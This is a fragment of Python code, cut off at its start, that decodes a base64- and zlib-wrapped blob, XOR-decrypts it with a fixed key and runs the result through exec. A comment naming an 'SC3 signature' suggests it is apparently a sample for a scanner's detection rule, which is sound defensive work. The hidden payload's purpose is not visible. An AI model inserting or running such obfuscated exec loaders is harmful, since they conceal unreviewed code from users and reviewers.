th/8ej5I8dpj6AZGxF3xV3Pv1WfkBKvpQ+v4DxlLO4NNwI75HSLx9VBOOj75CRY/uwdd0zg2Xop9HoGShIffz8ny/mwOCxbjbar78pnT0g"
_K = bytes.fromhex("7e0fd273c15fb26c1dc8e7df")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
